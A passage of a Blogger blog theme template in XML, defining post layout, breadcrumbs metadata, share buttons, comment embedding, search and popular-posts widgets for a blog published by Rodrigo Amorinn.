                  &quot;@type&quot;: &quot;ListItem&quot;,
                  &quot;position&quot;: 2,
                  &quot;item&quot;: {
                    &quot;name&quot;: &quot;<b:if cond='data:post.labels'><data:post.labels.last.name/></b:if>&quot;,
                    &quot;@id&quot;: &quot;<data:post.labels.last.url.jsonEscaped/>&quot;
                  }
                },{
                  &quot;@type&quot;: &quot;ListItem&quot;,
                  &quot;position&quot;: 3,
                  &quot;item&quot;: {
                    &quot;name&quot;: &quot;<data:post.title/>&quot;,
                    &quot;@id&quot;: &quot;<data:post.url.jsonEscaped/>&quot;
                  }
                }]
              }
            </script>
            </b:includable>
            <b:includable id='postCategory' var='post'>
              <!-- Post Label/Category -->
              <b:if cond='data:view.isMultipleItems and data:post.labels'>
                <span class='post-tag index-post-tag'>
                  <data:post.labels.last.name/>
                </span>
              </b:if>
            </b:includable>
            <b:includable id='postCommentsAndAd' var='post'>
              <!-- Post, Comments and Ads -->
              <!-- Post Content Index and Item -->
              <div class='blog-post hentry'>
                <b:class cond='data:view.isMultipleItems' name='index-post'/>
                <b:class cond='data:view.isSingleItem' name='item-post'/>
                <b:include data='post' name='post'/>
              </div>
              <!-- Comments -->
              <b:if cond='data:view.isSingleItem'>
                <div class='blog-post-comments'>
                  <b:include data='post' name='threadedCommentsDisqus'/>
                  <b:include data='post' name='commentPicker'/>
                </div>
              </b:if>
            </b:includable>
            <b:includable id='postCommentsLink'>
              <b:if cond='data:view.isMultipleItems'>
                <span class='byline post-comment-link container'>
                  <b:include cond='data:post.commentSource != 1' name='commentsLink'/>
                  <b:include cond='data:post.commentSource == 1' name='commentsLinkIframe'/>
                </span>
              </b:if>
            </b:includable>
            <b:includable id='postFeaturedImage' var='post'>
              <!-- Post Featured Image on Index -->
              <div class='post-image-wrap'>
                <a class='post-image-link' expr:href='data:post.url'>
                  <b:if cond='data:post.featuredImage'> 
                    <img class='post-thumb' expr:alt='data:post.title' expr:src='resizeImage(data:post.featuredImage, 72, &quot;1:1&quot;)'/>
                    <b:else/>
                    <img class='post-thumb' expr:alt='data:post.title' src='https://4.bp.blogspot.com/-O3EpVMWcoKw/WxY6-6I4--I/AAAAAAAAB2s/KzC0FqUQtkMdw7VzT6oOR_8vbZO6EJc-ACK4BGAYYCw/w680/nth.png'/>
                  </b:if>
                 <span class='post-tag'><data:post.labels.last.name/></span>  
                </a>
                
              </div>
            </b:includable>
            <b:includable id='postFooter' var='post'>
              <!-- Post Footer Itens -->
              <div class='post-footer'>
                <!-- Post Labels, Reactions, Share, Navigation, About Author an Related Posts -->
                <b:include data='post' name='footerBylines'/>
                <b:include cond='data:allBylineItems.icons' data='post' name='postNavigation'/>
                <b:include cond='data:post.author.aboutMe' data='post' name='aboutPostAuthor'/>
                <b:include data='post' name='postRelated'/>
              </div>
            </b:includable>
            <b:includable id='postFooterAuthorProfile' var='post'>
              <b:comment>Disabled</b:comment>   
            </b:includable>
            <b:includable id='postHeader' var='post'>
              <b:include cond='data:view.isPost' data='post' name='postBreadcrumbs'/>
              <b:include cond='data:view.isPost' data='post' name='postCategory'/>
              <b:include data='post' name='postTitle'/>
              <b:include cond='!data:view.isPage' data='post' name='headerByline'/>
            </b:includable>
            <b:includable id='postJumpLink' var='post'>
              <b:if cond='data:blog.jumpLinkMessage != &quot;hide&quot;'>
                <a class='read-more' expr:href='data:post.url'><data:blog.jumpLinkMessage/></a>
              </b:if>
            </b:includable>
            <b:includable id='postLabels' var='post'>
              <b:if cond='data:allBylineItems.labels'>
                <b:if cond='data:post.labels'>
                  <div class='post-labels'>
                    <span><data:allBylineItems.labels.label/></span>
                    <div class='label-head Label'>
                      <b:loop values='data:post.labels' var='label'>
                        <a class='label-link' expr:href='data:label.url' rel='tag'><data:label.name/></a>
                      </b:loop>
                    </div>
                  </div>
                </b:if>
              </b:if>
            </b:includable>
            <b:includable id='postLocation'>
  <span class='byline post-location'>
    <data:byline.label/>
    <a expr:href='data:post.location.mapsUrl' target='_blank'><data:post.location.name/></a>
  </span>
</b:includable>
            <b:includable id='postMeta' var='post'>
              <b:include data='post' name='postMetadataJSON'/>
            </b:includable>
            <b:includable id='postMetadataJSONImage'>
  &quot;image&quot;: {
    &quot;@type&quot;: &quot;ImageObject&quot;,
    <b:if cond='data:post.featuredImage.isResizable'>
    &quot;url&quot;: &quot;<b:eval expr='resizeImage(data:post.featuredImage, 1200, &quot;1200:630&quot;)'/>&quot;,
    &quot;height&quot;: 630,
    &quot;width&quot;: 1200
    <b:else/>
    &quot;url&quot;: &quot;https://lh3.googleusercontent.com/ULB6iBuCeTVvSjjjU1A-O8e9ZpVba6uvyhtiWRti_rBAs9yMYOFBujxriJRZ-A=w1200&quot;,
    &quot;height&quot;: 348,
    &quot;width&quot;: 1200
    </b:if>
  },
</b:includable>
            <b:includable id='postMetadataJSONPublisher'>
 &quot;publisher&quot;: {
    &quot;@type&quot;: &quot;Person&quot;,
    &quot;name&quot;: &quot;Rodrigo Amorinn&quot;,
    &quot;url&quot;: &quot;<data:blog.homepageUrl.jsonEscaped/>&quot;,
    &quot;logo&quot;: {
      &quot;@type&quot;: &quot;ImageObject&quot;,
      &quot;url&quot;: &quot;https://blogger.googleusercontent.com/img/a/AVvXsEikHPc0MLf4jIXZxYgeLpYRH7weKB4NZmjBYlcsrxNFD3YMDjjKM4PfTLv37JWmLb7iVLt1mS3ILXqzA3eAERkN0t9A8mzsPlG4D2Ty0gw9-5N90v_VTP3vxcnnTcEcr_L4FhR1AK6_3ODTj0FhniCpC3WdS5qaQqAFS_6Kf-BvpAmOmabvwtzo8szRgxPU=s390&quot;,
      &quot;width&quot;: 390,
      &quot;height&quot;: 117
    }
  },
</b:includable>
            <b:includable id='postNavigation' var='post'>
              <!-- Post Navigation Item -->
              <ul class='post-nav'>
                <li class='post-next'> 
                  <b:if cond='data:newerPageUrl'> 
                    <a class='next-post-link' expr:href='data:newerPageUrl' expr:id='data:widget.instanceId + &quot;_blog-pager-newer-link&quot;' rel='next'>
                      <div class='post-nav-inner'><span><data:messages.newer/></span><p/></div>
                    </a> 
                    <b:else/> 
                    <a rel='next'><div class='post-nav-inner post-nav-active'><span><data:messages.newer/></span><p><data:post.title/></p></div></a> 
                  </b:if> 
                </li>
                <li class='post-prev'> 
                  <b:if cond='data:olderPageUrl'> 
                    <a class='prev-post-link' expr:href='data:olderPageUrl' expr:id='data:widget.instanceId + &quot;_blog-pager-older-link&quot;' rel='previous'>
                      <div class='post-nav-inner'><span><data:messages.older/></span><p/></div>
                    </a> 
                    <b:else/>
                    <a rel='previous'><div class='post-nav-inner post-nav-active'><span><data:messages.older/></span><p><data:post.title/></p></div></a> 
                  </b:if> 
                </li>
              </ul>
            </b:includable>
            <b:includable id='postPagination'>
  <div class='blog-pager container' id='blog-pager'>
    <b:include cond='data:newerPageUrl' name='previousPageLink'/>
    <b:include cond='data:olderPageUrl' name='nextPageLink'/>
    <b:include cond='data:view.url != data:blog.homepageUrl' name='homePageLink'/>
  </div>
</b:includable>
            <b:includable id='postReactions' var='post'>
              <!-- Post Reactions -->
              <b:if cond='data:allBylineItems.reactions'>
                <div class='post-reactions'>
                  <span><data:allBylineItems.reactions.label/></span>
                  <div class='reactions-inner'>
                    <iframe allowtransparency='true' class='reactions-iframe' expr:src='data:posts[0].reactionsUrl' frameborder='0' name='reactions' scrolling='no'/>
                  </div>                  
                </div>
              </b:if>            
            </b:includable>
            <b:includable id='postRelated' var='post'>
              <!-- Related Posts -->
                <div id='related-wrap'>
                  <div class='title-wrap'>
                    <h3><data:messages.youMayLikeThesePosts/></h3>
                  </div>
                  <div class='related-ready'>
                    <b:if cond='data:post.labels'>
                      <div class='related-tag' expr:data-label='data:post.labels.first.name'/>
                      <b:else/>
                      <div class='related-tag' data-label='random'/>
                    </b:if>
                  </div> 
                </div>  
            </b:includable>
            <b:includable id='postShareButtons' var='post'>
              <!-- Post ShareButtons -->
              <b:if cond='data:allBylineItems.share'>
                <div class='post-share'>
                  <ul class='share-links social social-color'>
                    <li class='facebook'><a class='facebook' expr:href='&quot;https://www.facebook.com/sharer.php?u=&quot; + data:post.url' onclick='window.open(this.href, &apos;windowName&apos;, &apos;width=550, height=650, left=24, top=24, scrollbars, resizable&apos;); return false;' rel='nofollow'/></li>
                    <li class='twitter'><a class='twitter' expr:href='&quot;https://twitter.com/share?url=&quot; + data:post.url + &quot;&amp;text=&quot; + data:post.title' onclick='window.open(this.href, &apos;windowName&apos;, &apos;width=550, height=450, left=24, top=24, scrollbars, resizable&apos;); return false;' rel='nofollow'/></li>
                    <li class='pinterest'><a class='pinterest' expr:href='&quot;https://www.pinterest.com/pin/create/button/?url=&quot; + data:post.url + &quot;&amp;media=&quot; + data:post.featuredImage + &quot;&amp;description=&quot; + data:post.title' onclick='window.open(this.href, &apos;windowName&apos;, &apos;width=735, height=750, left=24, top=24, scrollbars, resizable&apos;); return false;' rel='nofollow'/></li> 
                    <li class='linkedin'><a class='linkedin' expr:href='&quot;https://www.linkedin.com/shareArticle?url=&quot; + data:post.url' onclick='window.open(this.href, &apos;windowName&apos;, &apos;width=550, height=650, left=24, top=24, scrollbars, resizable&apos;); return false;' rel='nofollow'/></li>
                    <b:if cond='data:blog.isMobileRequest'>
                      <li class='whatsapp whatsapp-mobile'><a class='whatsapp' expr:href='&quot;https://api.whatsapp.com/send?text=&quot; + data:post.title + &quot; | &quot; + data:post.url' rel='nofollow' target='_blank'/></li>
                      <b:else/>
                      <li class='whatsapp whatsapp-desktop'><a class='whatsapp' expr:href='&quot;https://web.whatsapp.com/send?text=&quot; + data:post.title + &quot; | &quot; + data:post.url' onclick='window.open(this.href, &apos;windowName&apos;, &apos;width=900, height=550, left=24, top=24, scrollbars, resizable&apos;); return false;' rel='nofollow'/></li>
                    </b:if>
                    <li class='email'><a class='email' expr:href='&quot;mailto:?subject=&quot; + data:post.title + &quot;&amp;body=&quot; + data:post.url' onclick='window.open(this.href, &apos;windowName&apos;, &apos;width=500, height=400, left=24, top=24, scrollbars, resizable&apos;); return false;' rel='nofollow'/></li>
                  </ul>
                </div>
              </b:if>
            </b:includable>
            <b:includable id='postShortMeta'>
              <b:comment>Disabled</b:comment> 
            </b:includable>
            <b:includable id='postSummary' var='post'>
              <!-- Post Summary -->
              <p class='post-snippet'><b:eval expr='data:post.snippets.long snippet { length: 150 }'/></p>
            </b:includable>
            <b:includable id='postTimestamp' var='post'>
              <!-- Post Timestamp -->
              <b:if cond='data:allBylineItems.timestamp'>
                <span class='post-date published' expr:datetime='data:post.date.iso8601'><data:post.date/></span>
              </b:if>
            </b:includable>
            <b:includable id='postTitle' var='post'>
              <!-- Post Title Index and Item -->
              <b:if cond='data:view.isMultipleItems'>
                <h2 class='post-title'>
                  <a expr:href='data:post.url'><data:post.title/></a>
                </h2>
              </b:if>
              <b:if cond='data:view.isSingleItem'>
                <h1 class='post-title'>
                  <data:post.title/>
                </h1>
              </b:if>
            </b:includable>
            <b:includable id='previousPageLink'>
              <a class='blog-pager-newer-link' expr:href='data:newerPageUrl' expr:id='data:widget.instanceId + &quot;_blog-pager-newer-link&quot;' expr:title='data:messages.newerPosts'>
                <data:messages.newerPosts/>
              </a>
            </b:includable>
            <b:includable id='searchMessage'>
              <!-- Search Message -->
              <b:if cond='data:view.search.query'>
                <div class='queryMessage'>
                  <b:if cond='data:posts.empty'>
                    <span class='query-info query-error'/><data:view.search.resultsMessageHtml/><a class='show-more' expr:href='data:blog.homepageUrl'><data:messages.showAll/></a>
                    <b:else/>
                    <span class='query-info query-success'><data:view.search.resultsMessageHtml/></span><a class='show-more' expr:href='data:blog.homepageUrl'><data:messages.showAll/></a>
                  </b:if>
                </div>
              </b:if>
              <b:if cond='data:view.search.label'>
                <div class='queryMessage'>
                  <b:if cond='data:posts.empty'>
                    <span class='query-info query-error'><data:view.search.resultsMessageHtml/></span><a class='show-more' expr:href='data:blog.homepageUrl'><data:messages.showAll/></a>
                    <b:else/>
                    <span class='query-info query-success'><data:view.search.resultsMessageHtml/></span><a class='show-more' expr:href='data:blog.homepageUrl'><data:messages.showAll/></a>
                  </b:if>
                </div>
              </b:if>
              <b:if cond='data:view.isArchive'>
                <div class='queryMessage'>
                  <b:if cond='data:posts.empty'>
                    <span class='query-info query-error'><data:view.archive.rangeMessage/></span><a class='show-more' expr:href='data:blog.homepageUrl'><data:messages.showAll/></a>
                    <b:else/>
                    <span class='query-info query-success'><data:view.archive.rangeMessage/></span><a class='show-more' expr:href='data:blog.homepageUrl'><data:messages.showAll/></a>
                  </b:if>
                </div>
              </b:if>
              <b:if cond='data:view.isError'>
                <div class='errorWrap'>
                  <h3>404</h3>
                  <h4><data:messages.theresNothingHere/></h4>
                  <p><data:navMessage/></p>
                  <a class='homepage' expr:href='data:blog.homepageUrl'><i class='fa fa-home'/> <data:messages.home/></a>
                </div>
              </b:if>
              <b:if cond='data:view.isMultipleItems and data:posts.empty'><div class='queryEmpty'><data:messages.noResultsFound/></div></b:if>
            </b:includable>
            <b:includable id='sharingButton'>
  <span expr:aria-label='data:platform.shareMessage' expr:class='&quot;sharing-platform-button sharing-element-&quot; + data:platform.key' expr:data-href='data:shareUrl + &quot;&amp;target=&quot; + data:platform.target' expr:data-url='data:originalUrl' expr:title='data:platform.shareMessage' role='menuitem' tabindex='-1'>
    <b:include name='sharingPlatformIcon'/>
    <span class='platform-sharing-text'><data:platform.name/></span>
  </span>
</b:includable>
            <b:includable id='sharingButtonContent'>
  <div class='flat-icon-button ripple'>
    <b:include name='shareIcon'/>
  </div>
</b:includable>
            <b:includable id='sharingButtons'>
  <div class='sharing' expr:aria-owns='&quot;sharing-popup-&quot; + data:sharingId' expr:data-title='data:shareTitle'>
    <button class='sharing-button touch-icon-button' expr:aria-controls='&quot;sharing-popup-&quot; + data:sharingId' expr:aria-label='data:messages.share.escaped' expr:id='&quot;sharing-button-&quot; + data:sharingId' role='button'>
      <b:include name='sharingButtonContent'/>
    </button>
    <b:include name='sharingButtonsMenu'/>
  </div>
</b:includable>
            <b:includable id='sharingButtonsMenu'>
  <div class='share-buttons-container'>
    <ul aria-hidden='true' class='share-buttons hidden' expr:aria-label='data:messages.share.escaped' expr:id='&quot;sharing-popup-&quot; + data:sharingId' role='menu'>
      <b:loop values='(data:platforms ?: data:blog.sharing.platforms) filter (p =&gt; p.key not in {&quot;blogThis&quot;})' var='platform'>
        <li>
          <b:include name='sharingButton'/>
        </li>
      </b:loop>
      <li aria-hidden='true' class='hidden'>
        <b:include name='otherSharingButton'/>
      </li>
    </ul>
  </div>
</b:includable>
            <b:includable id='sharingPlatformIcon'>
  <b:include data='{ iconClass: (&quot;touch-icon sharing-&quot; + data:platform.key) }' expr:name='data:platform.key + &quot;Icon&quot;'/>
</b:includable>
            <b:includable id='threadedCommentForm' var='post'>
              <div class='comment-form'>
                <a name='comment-form'/>
                <b:if cond='data:this.messages.blogComment != &quot;&quot;'>
                  <p><data:this.messages.blogComment/></p>
                </b:if>
                <b:include data='post' name='commentFormIframeSrc'/>
                <iframe allowtransparency='allowtransparency' class='blogger-iframe-colorize blogger-comment-from-post' expr:height='data:cmtIframeInitialHeight ?: &quot;90px&quot;' frameborder='0' id='comment-editor' name='comment-editor' src='' width='100%'/>
                <data:post.cmtfpIframe/>
                <script type='text/javascript'>
                  BLOG_CMT_createIframe(&#39;<data:post.appRpcRelayPath/>&#39;);
                </script>
              </div>
            </b:includable>
            <b:includable id='threadedCommentJs' var='post'>
              <script async='async' expr:src='data:post.commentSrc' type='text/javascript'/>
              <b:template-script inline='true' name='threaded_comments'/>
              <script type='text/javascript'>
                blogger.widgets.blog.initThreadedComments(
                  <data:post.commentJso/>,
                  <data:post.commentMsgs/>,
                  <data:post.commentConfig/>);
              </script>
            </b:includable>
            <b:includable id='threadedComments' var='post'>
              <section class='comments threaded' expr:data-embed='data:post.embedCommentForm' expr:data-num-comments='data:post.numberOfComments' id='comments'>
                <a name='comments'/>

                <b:include name='commentsTitle'/>

                <div class='comments-content'>
                  <b:if cond='data:post.embedCommentForm'>
                    <b:include data='post' name='threadedCommentJs'/>
                  </b:if>
                  <div id='comment-holder'>
                    <data:post.commentHtml/>
                  </div>
                </div>

                <p class='comment-footer'>
                  <b:if cond='data:post.allowNewComments'>
                    <b:include data='post' name='threadedCommentForm'/>
                    <b:else/>
                    <data:post.noNewCommentsText/>
                  </b:if>
                </p>

                <b:if cond='data:showCmtPopup'>
                  <div id='comment-popup'>
                    <iframe allowtransparency='allowtransparency' frameborder='0' id='comment-actions' name='comment-actions' scrolling='no'>
                    </iframe>
                  </div>
                </b:if>
              </section>
            </b:includable>
            <b:includable id='threadedCommentsDisqus' var='post'>
              <script type='text/javascript'>
                var disqus_blogger_current_url = &quot;<data:blog.canonicalUrl/>&quot;;
                if (!disqus_blogger_current_url.length) {
                  disqus_blogger_current_url = &quot;<data:blog.url/>&quot;;
                }
                var disqus_blogger_homepage_url = &quot;<data:blog.homepageUrl/>&quot;;
                var disqus_blogger_canonical_homepage_url = &quot;<data:blog.canonicalHomepageUrl/>&quot;;
              </script>
            </b:includable>
            <b:includable id='tooltipCss'>
  <!-- LINT.IfChange -->
  <style>
    .post-body a.b-tooltip-container {
      position: relative;
      display: inline-block;
    }

    .post-body a.b-tooltip-container .b-tooltip {
      display: block !important;
      position: absolute;
      top: 100%;
      left: 50%;
      transform: translate(-20%, 1px);
      visibility: hidden;
      opacity: 0;
      z-index: 1;
      transition: opacity 0.2s ease-in-out;
    }

    .post-body a.b-tooltip-container .b-tooltip iframe {
      width: 200px;
      height: 198px;
      max-width: none;
      border: none;
      border-radius: 20px;
      box-shadow: 1px 1px 3px 1px rgba(0, 0, 0, 0.2);
    }

    @media (hover: hover) {
      .post-body a.b-tooltip-container:hover .b-tooltip {
        visibility: visible;
        opacity: 1;
      }
    }
  </style>
  <!-- LINT.ThenChange(//depot/google3/java/com/google/blogger/b2/layouts/widgets/v2-style.css) -->
</b:includable>
          </b:widget>
        </b:section> 
      </div>
<b:if cond='data:blog.pageType != &quot;static_page&quot;'><div>
      <!-- Sidebar Wrapper -->
      <div id='sidebar-wrapper'>
        <b:section class='sidebar common-widget' id='sidebar1' name='Sidebar Right (A)' showaddelement='yes'>
          <b:widget id='BlogSearch1' locked='false' title='Search This Blog' type='BlogSearch' visible='true'>
            <b:includable id='main' var='this'>
      <b:include name='widget-title'/>
      <b:include name='content'/>
    </b:includable>
            <b:includable id='content'>
      <div class='widget-content' role='search'>
        <form class='search-form' expr:action='data:blog.searchUrl'>
          <b:attr cond='not data:view.isPreview' name='target' value='_top'/>
          <b:include name='urlParamsAsFormInput'/>
          <input autocomplete='off' class='search-input' expr:aria-label='data:messages.searchThisBlog' expr:placeholder='data:messages.searchThisBlog' expr:value='data:view.isSearch ? data:view.search.query.escaped : &quot;&quot;' name='q'/>
          <input class='search-action' expr:value='data:messages.search.escaped' type='submit'/>  
        </form>
      </div>
    </b:includable>
            <b:includable id='searchForm'>
  <form expr:action='data:blog.searchUrl'>
    <b:attr cond='not data:view.isPreview' name='target' value='_top'/>
    <b:include name='urlParamsAsFormInput'/>
    <div class='search-input'>
      <input autocomplete='off' expr:aria-label='data:messages.searchThisBlog' expr:placeholder='data:messages.searchThisBlog' expr:value='data:view.isSearch ? data:view.search.query.escaped : &quot;&quot;' name='q'/>
    </div>
    <b:include name='searchSubmit'/>
  </form>
</b:includable>
            <b:includable id='searchSubmit'>
  <input class='search-action' expr:value='data:messages.search.escaped' type='submit'/>
</b:includable>
          </b:widget>
          <b:widget id='PopularPosts1' locked='false' title='Popular Posts' type='PopularPosts' version='2' visible='true'>
            <b:widget-settings>
              <b:widget-setting name='numItemsToShow'>8</b:widget-setting>
              <b:widget-setting name='showThumbnails'>true</b:widget-setting>
              <b:widget-setting name='showSnippets'>false</b:widget-setting>
              <b:widget-setting name='timeRange'>ALL_TIME</b:widget-setting>
            </b:widget-settings>
            <b:includable id='main' var='this'>
      <b:include name='widget-title'/>
      <div class='widget-content'>
        <b:loop values='data:posts' var='post'>
          <b:include data='post' name='postContent'/>
        </b:loop>
      </div>
    </b:includable>
            <b:includable id='blogThisShare'>
  <b:with value='&quot;window.open(this.href, \&quot;_blank\&quot;, \&quot;height=270,width=475\&quot;); return false;&quot;' var='onclick'>
    <b:include name='platformShare'/>
  </b:with>
</b:includable>
            <b:includable id='bylineByName' var='byline'>
  <b:switch var='data:byline.name'>
  <b:case value='share'/>
    <b:include cond='data:post.shareUrl' name='postShareButtons'/>
  <b:case value='comments'/>
    <b:include cond='data:post.allowComments' name='postCommentsLink'/>
  <b:case value='location'/>
    <b:include cond='data:post.location' name='postLocation'/>
  <b:case value='timestamp'/>
    <b:include cond='not data:view.isPage' name='postTimestamp'/>
  <b:case value='author'/>
    <b:include name='postAuthor'/>
  <b:case value='labels'/>
    <b:include cond='data:post.labels' name='postLabels'/>
  <b:case value='icons'/>
    <b:include cond='data:post.emailPostUrl' name='emailPostIcon'/>
  </b:switch>
</b:includable>
            <b:includable id='bylineRegion' var='regionItems'>
  <b:loop values='data:regionItems' var='byline'>
    <b:include data='byline' name='bylineByName'/>
  </b:loop>
</b:includable>
            <b:includable id='commentsLink'>
  <a class='comment-link' expr:href='data:post.commentsUrl' expr:onclick='data:post.commentsUrlOnclick'>
    <b:if cond='data:post.numberOfComments &gt; 0'>
      <b:message name='messages.numberOfComments'>
        <b:param expr:value='data:post.numberOfComments' name='numComments'/>
      </b:message>
    <b:else/>
      <data:messages.postAComment/>
    </b:if>
  </a>
</b:includable>
            <b:includable id='commentsLinkIframe'>
  <!-- G+ comments, no longer available. The includable is retained for backwards-compatibility. -->
</b:includable>
            <b:includable id='emailPostIcon'>
  <span class='byline post-icons'>
    <!-- email post links -->
    <span class='item-action'>
      <a expr:href='data:post.emailPostUrl' expr:title='data:messages.emailPost'>
        <b:include data='{ iconClass: &quot;touch-icon sharing-icon&quot; }' name='emailIcon'/>
      </a>
    </span>
  </span>
</b:includable>
            <b:includable id='facebookShare'>
  <b:with value='&quot;window.open(this.href, \&quot;_blank\&quot;, \&quot;height=430,width=640\&quot;); return false;&quot;' var='onclick'>
    <b:include name='platformShare'/>
  </b:with>
</b:includable>
            <b:includable id='footerBylines'>
  <b:if cond='data:widgets.Blog.first.footerBylines'>
    <b:loop index='i' values='data:widgets.Blog.first.footerBylines' var='region'>
      <b:if cond='not data:region.items.empty'>
        <div expr:class='&quot;post-footer-line post-footer-line-&quot; + (data:i + 1)'>
          <b:with value='&quot;footer-&quot; + (data:i + 1)' var='regionName'>
            <b:include data='region.items' name='bylineRegion'/>
          </b:with>
        </div>
      </b:if>
    </b:loop>
  </b:if>
</b:includable>
            <b:includable id='googlePlusShare'>
  <b:comment>Google+ sharing removed because the service is discontinued.</b:comment>
</b:includable>
            <b:includable id='headerByline'>
  <b:if cond='data:widgets.Blog.first.headerByline'>
    <div class='post-header'>
      <div class='post-header-line-1'>
        <b:with value='&quot;header-1&quot;' var='regionName'>
          <b:include data='data:widgets.Blog.first.headerByline.items' name='bylineRegion'/>
        </b:with>
      </div>
    </div>
  </b:if>
</b:includable>
            <b:includable id='linkShare'>
  <b:with value='&quot;window.prompt(\&quot;Copy to clipboard: Ctrl+C, Enter\&quot;, \&quot;&quot; + data:originalUrl + &quot;\&quot;); return false;&quot;' var='onclick'>
    <b:include name='platformShare'/>
  </b:with>
</b:includable>
            <b:includable id='otherSharingButton'>
  <span class='sharing-platform-button sharing-element-other' expr:aria-label='data:messages.shareToOtherApps.escaped' expr:data-url='data:originalUrl' expr:title='data:messages.shareToOtherApps.escaped' role='menuitem' tabindex='-1'>
    <b:with value='{key: &quot;sharingOther&quot;}' var='platform'>
      <b:include name='sharingPlatformIcon'/>
    </b:with>
    <span class='platform-sharing-text'><data:messages.shareOtherApps.escaped/></span>
  </span>
</b:includable>
            <b:includable id='platformShare'>
  <a expr:class='&quot;goog-inline-block sharing-&quot; + data:platform.key' expr:data-url='data:originalUrl' expr:href='data:shareUrl + &quot;&amp;target=&quot; + data:platform.target' expr:onclick='data:onclick ? data:onclick : &quot;&quot;' expr:title='data:platform.shareMessage' target='_blank'>
    <span class='share-button-link-text'>
      <data:platform.shareMessage/>
    </span>
  </a>
</b:includable>
            <b:includable id='postAuthor'>
  <span class='byline post-author vcard'>
    <span class='post-author-label'>
      <data:byline.label/>
    </span>
    <span class='fn'>
      <b:if cond='data:post.author.profileUrl'>
        <meta expr:content='data:post.author.profileUrl'/>
        <a class='g-profile' expr:href='data:post.author.profileUrl' rel='author' title='author profile'>
          <span><data:post.author.name/></span>
        </a>
      <b:else/>
        <span><data:post.author.name/></span>
      </b:if>
    </span>
  </span>
</b:includable>
            <b:includable id='postCommentsLink'>
  <span class='byline post-comment-link container'>
    <b:include cond='data:post.commentSource != 1' name='commentsLink'/>
  </span>
</b:includable>
            <b:includable id='postContent' var='post'>
      <div class='post'>
        <div class='post-content'>
          <a class='post-image-link' expr:href='data:post.url'>
            <b:if cond='data:post.featuredImage'>
              <img class='post-thumb' expr:alt='data:post.title' expr:src='resizeImage(data:post.featuredImage, 72, &quot;1:1&quot;)'/>
              <b:else/>
              <img class='post-thumb' expr:alt='data:post.title' src='https://4.bp.blogspot.com/-O3EpVMWcoKw/WxY6-6I4--I/AAAAAAAAB2s/KzC0FqUQtkMdw7VzT6oOR_8vbZO6EJc-ACK4BGAYYCw/w680/nth.png'/>
            </b:if>
            <span class='post-tag'><data:post.labels.last.name/></span>
          </a>
          <div class='post-info'>
            <h2 class='post-title'>
              <a expr:href='data:post.url'><data:post.title/></a>
            </h2>
            <div class='post-meta'>
              <span class='post-date published' expr:datetime='data:post.date.iso8601'><data:post.date/></span>
            </div>
          </div>
        </div>
      </div>
    </b:includable>
            <b:includable id='postJumpLink' var='post'>
  <div class='jump-link flat-button'>
    <a expr:href='data:post.url fragment &quot;more&quot;' expr:title='data:post.title'>
      <b:eval expr='data:blog.jumpLinkMessage'/>
    </a>
  </div>
</b:includable>
            <b:includable id='postLabels'>
  <span class='byline post-labels'>
    <span class='byline-label'><data:byline.label/></span>
    <b:loop index='i' values='data:post.labels' var='label'>
      <a expr:href='data:label.url' rel='tag'>
        <data:label.name/>
      </a>
    </b:loop>
  </span>
</b:includable>
            <b:includable id='postLocation'>
  <span class='byline post-location'>
    <data:byline.label/>
    <a expr:href='data:post.location.mapsUrl' target='_blank'><data:post.location.name/></a>
  </span>
</b:includable>
            <b:includable id='postReactions'>
  <!-- Reaction feature no longer available. The includable is retained for backwards-compatibility. -->
</b:includable>
            <b:includable id='postShareButtons'>
  <div class='byline post-share-buttons goog-inline-block'>
    <b:with value='data:sharingId ?: ((data:widget.instanceId ?: &quot;sharing&quot;) + &quot;-&quot; + (data:regionName ?: &quot;byline&quot;) + &quot;-&quot; + data:post.id)' var='sharingId'>
      <!-- Note: 'sharingButtons' includable is from the default Sharing widget markup. -->
      <b:include data='{                                                sharingId: data:sharingId,                                                originalUrl: data:post.url,                                                platforms: data:this.sharing.platforms,                                                shareUrl: data:post.shareUrl,                                                shareTitle: data:post.title,                                              }' name='sharingButtons'/>
    </b:with>
  </div>
</b:includable>
            <b:includable id='postTimestamp'>
  <span class='byline post-timestamp'>
    <data:byline.label/>
    <b:if cond='data:post.url'>
      <meta expr:content='data:post.url.canonical'/>
      <a class='timestamp-link' expr:href='data:post.url' rel='bookmark' title='permanent link'>
        <time class='published' expr:datetime='data:post.date.iso8601' expr:title='data:post.date.iso8601'>
          <data:post.date/>
        </time>
      </a>
    </b:if>
  </span>
</b:includable>
            <b:includable id='sharingButton'>
  <span expr:aria-label='data:platform.shareMessage' expr:class='&quot;sharing-platform-button sharing-element-&quot; + data:platform.key' expr:data-href='data:shareUrl + &quot;&amp;target=&quot; + data:platform.target' expr:data-url='data:originalUrl' expr:title='data:platform.shareMessage' role='menuitem' tabindex='-1'>
    <b:include name='sharingPlatformIcon'/>
    <span class='platform-sharing-text'><data:platform.name/></span>
  </span>
</b:includable>
            <b:includable id='sharingButtonContent'>
  <div class='flat-icon-button ripple'>
    <b:include name='shareIcon'/>
  </div>
</b:includable>
            <b:includable id='sharingButtons'>
  <div class='sharing' expr:aria-owns='&quot;sharing-popup-&quot; + data:sharingId' expr:data-title='data:shareTitle'>
    <button class='sharing-button touch-icon-button' expr:aria-controls='&quot;sharing-popup-&quot; + data:sharingId' expr:aria-label='data:messages.share.escaped' expr:id='&quot;sharing-button-&quot; + data:sharingId' role='button'>
      <b:include name='sharingButtonContent'/>
    </button>
    <b:include name='sharingButtonsMenu'/>
  </div>
</b:includable>
            <b:includable id='sharingButtonsMenu'>
  <div class='share-buttons-container'>
    <ul aria-hidden='true' class='share-buttons hidden' expr:aria-label='data:messages.share.escaped' expr:id='&quot;sharing-popup-&quot; + data:sharingId' role='menu'>
      <b:loop values='(data:platforms ?: data:blog.sharing.platforms) filter (p =&gt; p.key not in {&quot;blogThis&quot;})' var='platform'>
        <li>
          <b:include name='sharingButton'/>
        </li>
      </b:loop>
      <li aria-hidden='true' class='hidden'>
        <b:include name='otherSharingButton'/>
      </li>
    </ul>
  </div>
</b:includable>
            <b:includable id='sharingPlatformIcon'>
  <b:include data='{ iconClass: (&quot;touch-icon sharing-&quot; + data:platform.key) }' expr:name='data:platform.key + &quot;Icon&quot;'/>
</b:includable>
            <b:includable id='snippetedPostByline'>
  <b:with value='(data:widgets first (w =&gt; w.type == &quot;Blog&quot;)).allBylineItems' var='blogBylines'>
    <div class='item-byline'>
      <b:with value='data:blogBylines first (i =&gt; i.name == &quot;author&quot;)' var='byline'>
        <b:include cond='data:byline and data:this.postDisplay.showAuthor' data='post' name='postAuthor'/>
      </b:with>
      <b:with value='data:blogBylines first (i =&gt; i.name == &quot;timestamp&quot;)' var='byline'>
